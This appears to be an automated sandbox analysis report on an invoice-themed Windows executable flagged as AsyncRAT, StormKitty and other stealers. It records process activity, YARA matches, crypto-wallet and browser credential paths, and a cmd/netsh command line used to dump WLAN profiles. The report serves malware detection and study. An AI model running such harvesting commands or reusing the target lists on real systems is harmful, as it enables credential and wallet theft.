Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Queries volume information: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Queries volume information: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4114120570.0000000000420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7620, type: MEMORYSTR

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4131034510.0000000005CE6000.00000004.00000020.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4130636339.000000000595A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected StormKitty Stealer

Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4117062376.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4117251220.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7620, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7620, type: MEMORYSTR

Yara detected WorldWind Stealer

Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7620, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum#\Electrum\wallets
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus+\Exodus\exodus.wallet
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum%\Ethereum\keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4117062376.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4117251220.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7620, type: MEMORYSTR

Remote Access Functionality

Yara detected StormKitty Stealer

Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE
